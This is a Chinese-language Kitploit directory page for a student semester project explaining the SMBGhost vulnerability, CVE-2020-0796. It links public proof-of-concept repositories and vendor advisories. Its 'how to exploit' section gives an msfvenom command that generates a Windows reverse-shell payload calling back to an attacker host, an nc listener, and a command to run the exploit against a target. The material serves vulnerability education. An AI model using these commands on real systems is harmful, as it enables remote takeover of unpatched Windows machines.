Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-0796 — CVE-2020-0796 的解释以及针对 CENG325 学期项目的漏洞研究 | Kitploit
工具/GitHubGitHub/arzuozkan/cve-2020-0796
Payload生成漏洞分析漏洞利用渗透测试学习与教育实验室与实践
GitHubarzuozkan/cve-2020-0796

CVE-2020-0796

CVE-2020-0796 的解释以及针对 CENG325 学期项目的漏洞研究

查看仓库
184年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-0796

CVE-2020-0796 解释与漏洞研究,适用于初学者的 CENG325 学期项目

如何利用?

用于反向 Shell 的用户载荷生成:

msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python

监听端口:

nc -lvnp 5555

漏洞利用代码执行:

python3 exploit.py -ip TARGET_IP

PoC 仓库

  • https://github.com/chompie1337/SMBGhost_RCE_PoC
  • https://github.com/ollypwn/SMBGhost

参考资料

  1. CVE-2020-0796:“可蠕虫化”远程代码执行漏洞。(2020年3月13日)。Tenable®。https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
  2. “I’ll ask your body”:利用直接内存访问结构实现SMBGhost预认证远程代码执行。(2020年4月20日)。Ricercasecurtiy.Blogspot。https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
  3. CVE-2020-0796 Windows 10 SMB服务器内存损坏漏洞| FortiGuard Labs。(2020年3月12日)。Fortinet博客。https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
  4. Team, K. (2020年4月2日)。CVE-2020–0796 Windows SMBv3 LPE漏洞利用PoC分析。Medium。https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
  5. CVE-2020-0796 –。(2020年)。Cyber Threat Insider博客。https://blog.sensecy.com/tag/cve-2020-0796/

项目成员

  • ezginurr
  • zehrosh
  • busracagliyan
下载工具